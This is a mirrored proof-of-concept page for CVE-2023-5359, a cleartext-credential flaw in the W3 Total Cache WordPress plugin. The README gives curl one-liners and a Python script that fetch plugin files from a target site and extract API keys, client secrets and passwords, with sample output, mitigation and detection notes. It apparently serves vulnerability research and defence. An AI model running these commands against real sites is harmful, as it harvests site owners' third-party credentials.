支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: 8cc184ca3f82f8d828600fdf206a5e4f5fb7bd4a

来源
https://github.com/enzocipher/CVE-2023-5359
关联漏洞
标题:WordPress plugin W3 Total Cache 信息泄露漏洞 (CVE-2023-5359)
POC 描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin W3 Total Cache 2.7.5版本及之前版本存在信息泄露漏洞,该漏洞源于以纯文本形式存储Google OAuth API机密信息。攻击者利用该漏洞可以获取用户帐户信息的访问权限。
POC 描述
CVE-2023-5359 - W3 Total Cache Cleartext Storage Vulnerability Scanner. Detect exposed credentials in W3 Total Cache plugin versions ≤ 2.7.5.
介绍
# CVE-2023-5359 - W3 Total Cache Cleartext Storage Vulnerability

## Description

**CVE-2023-5359** is a cleartext storage vulnerability affecting the WordPress plugin **W3 Total Cache** in versions ≤ 2.7.5. This vulnerability allows remote attackers to access sensitive credentials stored in unencrypted PHP files that are publicly accessible.

## Severity

- **CVSS Score**: 7.5 (High)
- **Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Type**: Sensitive Information Exposure

## Technical Vulnerability

### Root Cause
W3 Total Cache stores configuration settings and API credentials in PHP files within the `/wp-content/plugins/w3-total-cache/` directory without adequate protection. These files are accessible via HTTP, exposing:

- API Keys (CloudFlare, Google, etc.)
- Client Secrets
- OAuth Tokens
- External service credentials

### Affected Files
```
/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php
/wp-content/plugins/w3-total-cache/Config.php
/wp-content/plugins/w3-total-cache/Cache_File.php
```

## Exploitation

### Manual Method
```bash
# Check if W3 Total Cache is installed
curl -s https://target.com/ | grep "w3-total-cache"

# Extract CloudFlare credentials
curl -s "https://target.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php" | grep -E "client_id|client_secret"

# Search all vulnerable files
for file in Extension_CloudFlare_Plugin.php Generic_Plugin_Admin.php Config.php; do
    echo "=== $file ==="
    curl -s "https://target.com/wp-content/plugins/w3-total-cache/$file" | grep -E "api_key|password|secret"
done
```

### Automated Script
```python
#!/usr/bin/env python3
import requests
import re

target = "https://victim.com"
files = [
    "/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
    "/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php"
]

for file in files:
    response = requests.get(target + file)
    credentials = re.findall(r"(api_key|client_secret|password)\s*=\s*['\"]([^'\"]+)", response.text)
    if credentials:
        print(f"[!] Credentials found in {file}:")
        for key, value in credentials:
            print(f"    {key}: {value}")
```

## Impact

An attacker can obtain:

1. **CloudFlare credentials** - Take control of CDN and DNS
2. **API Keys for external services** - Access external accounts
3. **OAuth Tokens** - Impersonate identity
4. **Cache configurations** - Manipulate served content

## Mitigation

### Immediate Solution
1. **Update** to W3 Total Cache ≥ 2.7.6
2. **Restrict access** to PHP files in the plugins directory
3. **Revoke and regenerate** all exposed credentials

### Secure Configuration
```apache
# .htaccess protection
<Files *.php>
    Deny from all
</Files>
<Files "w3-total-cache.php">
    Allow from all
</Files>
```

## Detection

### Verification Command
```bash
# Check for vulnerable version
curl -s https://target.com/wp-content/plugins/w3-total-cache/w3-total-cache.php | grep "Version"
```

### Compromise Indicators
- Unusual activity in external APIs
- Changes in CloudFlare configurations
- Traffic from unauthorized IPs to connected services

## Example Finding

```
[*] Scanning: https://example.com
[+] W3 Total Cache detected
[+] Accessible file: /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
[!] CREDENTIALS FOUND:
    client_id: GAxxxxxxxxxxxx78
    client_secret: ABcdEFghIJklMNopQRstUVwxYZ012345
```

## References

- [CVE-2023-5359](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5359)
- [W3 Total Cache Changelog](https://wordpress.org/plugins/w3-total-cache/#developers)
- [WordPress Security Team](https://wordpress.org/support/wordpress-version/version-security/)

## Legal Notice

This repository is for educational purposes and authorized penetration testing only. Malicious use of this information is strictly prohibited.

---

**Found this information useful?** Star the repository!

*Last updated: November 2025*
文件快照

 [4.0K]  /data/pocs/8cc184ca3f82f8d828600fdf206a5e4f5fb7bd4a
├── [4.9K]  poc.py
└── [4.0K]  README.md

1 directory, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。